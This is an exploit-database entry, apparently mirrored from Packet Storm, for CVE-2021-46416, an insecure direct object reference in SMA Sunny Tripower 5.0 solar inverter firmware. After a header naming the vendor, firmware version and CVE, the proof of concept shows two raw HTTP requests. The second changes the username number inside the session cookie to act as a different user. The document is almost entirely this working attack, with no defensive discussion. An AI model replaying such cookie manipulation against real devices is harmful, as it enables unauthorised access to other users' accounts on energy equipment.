Share
## https://sploitus.com/exploit?id=PACKETSTORM:166670
# Exploit Title: SAM SUNNY TRIPOWER 5.0 - Insecure Direct Object Reference (IDOR)  
# Date: 7/4/2022  
# Exploit Author: Momen Eldawakhly (Cyber Guy)  
# Vendor Homepage: https://www.sma.de  
# Version: SUNNY TRIPOWER 5.0 Firmware version 3.10.16.R  
# Tested on: Linux [Firefox]  
# CVE : CVE-2021-46416  
  
# Proof of Concept  
  
============[ Normal user request ]============  
  
GET / HTTP/1.1  
Host: 192.168.1.4  
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate  
DNT: 1  
Connection: close  
Cookie: tmhDynamicLocale.locale=%22en-us%22; user443=%7B%22role%22%3A%7B%22bitMask%22%3A2%2C%22title%22%3A%22usr%22%2C%22loginLevel%22%3A2%7D%2C%22username%22%3A861%2C%22sid%22%3A%22CDQMoPK0y6Q0-NaD%22%7D  
Upgrade-Insecure-Requests: 1  
  
============[ Manipulated username request ]============  
  
GET / HTTP/1.1  
Host: 192.168.1.4  
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate  
DNT: 1  
Connection: close  
Cookie: tmhDynamicLocale.locale=%22en-us%22; user443=%7B%22role%22%3A%7B%22bitMask%22%3A2%2C%22title%22%3A%22usr%22%2C%22loginLevel%22%3A2%7D%2C%22username%22%3A850%2C%22sid%22%3A%22CDQMoPK0y6Q0-NaD%22%7D  
Upgrade-Insecure-Requests: 1